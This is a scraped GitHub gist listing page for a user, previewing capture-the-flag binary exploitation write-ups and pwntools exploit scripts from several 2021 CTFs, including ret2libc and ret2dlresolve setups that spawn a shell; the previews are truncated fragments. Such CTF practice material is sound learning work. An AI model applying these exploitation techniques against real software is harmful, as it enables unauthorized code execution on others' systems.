Skip to content

Instantly share code, notes, and snippets.

View Error-200's full-sized avatar
🐧
Working from home

Yash Vardhan Error-200

🐧
Working from home
View GitHub Profile
@Error-200
Error-200 / _deobfuscating-unminifying-obfuscated-web-app-code.md
Created February 8, 2026 16:06 — forked from mrrootsec/_deobfuscating-unminifying-obfuscated-web-app-code.md
Some notes and tools for reverse engineering / deobfuscating / unminifying obfuscated web app code
@Error-200
Error-200 / pwn.md
Created September 10, 2021 05:23
All pwns sols for tmuctf-21

TMUCTF-21

Warmup

just give lot's of 0x414141.........................

simply fill up the entire stack with some random bytes (!= 0)

Baby Pwn

@Error-200
Error-200 / crashini.md
Last active June 26, 2025 02:27
HackINI CTF - 21

HackINI CTF - 21

Crash.INI - 0x0

#include <stdio.h>
#include <signal.h>
#include <fcntl.h>
#include <stdlib.h>
#include 
@Error-200
Error-200 / pwn.md
Last active June 14, 2021 17:48
ALL BINEXP SOLUTIONS OF BCA CTF - 21

BCA CTF - 21

PWN SOLUTIONS

BCA MART
#include <stdio.h>
#include <stdlib.h>

Here's a LIBC

Ok so beforing going through the challenge from pico-21 , I want to say it's ez ret2libc attack which you can almost found in every CTF's but I want to make it as much as detailed for those who are learning for the first time you can see this video but pe patient and complete you will learn a lot.

So let's start whenever you get a binary first try to run it and analyse it's behaviour but in this case when i run the binary :

@Error-200
Error-200 / baby_bof.py
Last active May 17, 2021 11:21
dCTF pwn xploits
from pwn import *
binary = context.binary = ELF('./baby_bof')
context.log_level = 'INFO'
if not args.REMOTE:
context.log_file = 'local.log'
libc = binary.libc
p = process(binary.path)
else:
@Error-200
Error-200 / xpl.py
Last active May 12, 2021 12:50
My exploits for S4CTF 2021
#OhBabyBaby
from pwn import *
binary = context.binary = ELF('./ohbabybaby')
p = remote('185.14.184.242',12990)
#p = process(binary.path)
p.sendline()
p.sendline()
y = p.recvuntil('Did you enjoy?').decode()
@Error-200
Error-200 / minefield.md
Last active June 22, 2021 06:16
HTB - apocalypse 2021

CYBER APOCALYPSE 2021

checksec

    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
@Error-200
Error-200 / jie.py
Last active April 19, 2021 21:26
My exploits for UMDCTF 2021
from pwn import *
binary = context.binary = ELF('./JIE')
rop = ROP(binary)
ret = rop.find_gadget(['ret'])[0]
dl = Ret2dlresolvePayload(binary, symbol='system', args=['sh'])
rop.raw(ret)